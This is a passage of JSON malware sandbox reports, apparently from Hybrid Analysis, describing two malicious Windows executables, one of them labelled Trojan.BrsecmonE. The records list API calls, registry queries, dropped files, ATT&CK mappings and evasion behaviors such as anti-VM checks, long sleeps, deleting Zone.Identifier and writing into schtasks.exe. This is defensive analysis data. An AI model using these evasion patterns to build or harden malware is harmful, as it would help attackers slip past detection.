"\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" reads file \"c:\\windows\\system32\\ntdll.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"sqlsec.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00004392]\n \"sqlsec.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00004392]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"LoadResource with parameter {'hModule': '1988165632', 'hResInfo': '8127984'}\" (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" queries volume information of \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" at 00000000-00004392-0000010C-6650202", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"IsWow64Process\" with parameter \"4392\" - (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c000000000074012c0000000000060000000000000050012c001a000000000d6d01000000001a0000000000000014000000000000000000000000000000000000000000000002000002784630007da500d800000000000000000000000080000000000000005dee08bb009430000100000000000000020000000c00000020533000205330001b533000000000000000000000002c0000000001a8f6120000000000c8fc120095e1b1774e504d00feffffff435cb5775059b57794000000a00000001a53300018533000940000004cf81200fdfe90770000000018000000de630bf1 (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c00530070ec2f001100001104d5000070af300078463000b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetWindowTextW\" (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00004392)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00004392)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"419497918\"\n \"cx\": \"300\"\n \"cy\": \"30\"}\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1560350113\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"755043058\"\n \"cx\": \"6\"\n \"cy\": \"21\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.888543686696129", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has resource with unusual entropy \"RT_ICON:7.97569052615\"\n \"sqlsec.exe\" has resource with unusual entropy \"RT_ICON:7.97569052615\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has an entrypoint in section \".sedata\"\n \"sqlsec.exe\" has an entrypoint in section \".sedata\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"sqlsec.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00004392]\n \"sqlsec.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00004392]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has section name .text with entropy \"7.99929720134\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has section name .sedata with entropy \"7.82267481353\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has section name .rsrc with entropy \"7.73798487722\"\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3\" has section name .sedata with entropy \"7.99290161119\"\n \"sqlsec.exe\" has section name .text with entropy \"7.99929720134\"\n \"sqlsec.exe\" has section name .sedata with entropy \"7.82267481353\"\n \"sqlsec.exe\" has section name .rsrc with entropy \"7.73798487722\"\n \"sqlsec.exe\" has section name .sedata with entropy \"7.99290161119\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-109", "type": 6, "relevance": 10, "name": "Calls an API typically used to determine the valid logical drives on the computer", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" called \"GetLogicalDriveStringsW\" with parameters {\"nBufferLength\": \"511\"\n \"lpBuffer\": \"C:\\\\\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\cryptsp.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" opened \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 600)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 600)\n \"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\schtasks.exe\" (Handle: 600)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe\" opened \"C:\\8e49a7b584b8035af0b605397a6f34bd1b7bd658914ce169833d1d072298eee3.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "binary-8", "type": 8, "relevance": 5, "name": "The input sample contains a known anti-VM trick", "description": "Found VM detection artifact \"VMware trick\" in \"sample.bin\" (Offset: 292974)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab
https://hybrid-analysis.com/sample/6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab
Hybrid Analysis - Um_unhooking
{"size": 10837624, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab", "sha256": "6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 8, "total_processes": 9, "total_signatures": 246, "extracted_files": [{"name": "mpvpepag.exe", "file_path": "%TEMP%\\mpvpepag.exe", "file_size": 5242368, "sha256": "e38e4a2332ba160c3ba956c0e17ab12019807a3ba5c939e89a4a9eb6ec43a9dd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe (PID: 5780)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "mpvpepag.exe.67EE4A69.bin", "file_size": 11431424, "sha256": "6c98bcaca6e93323c3d62ae737a0137fe459e3b3cb179d01208f6c6c6c2166bf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "d01dc25dfee1904c62ac4a08577860cef8e6259537c24910091ad25e6cc26c2a", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE5469.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005780", "name": "6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe", "normalized_path": "C:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe", "sha256": "6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab"}, {"uid": "00000000-00005828", "parentuid": "00000000-00005780", 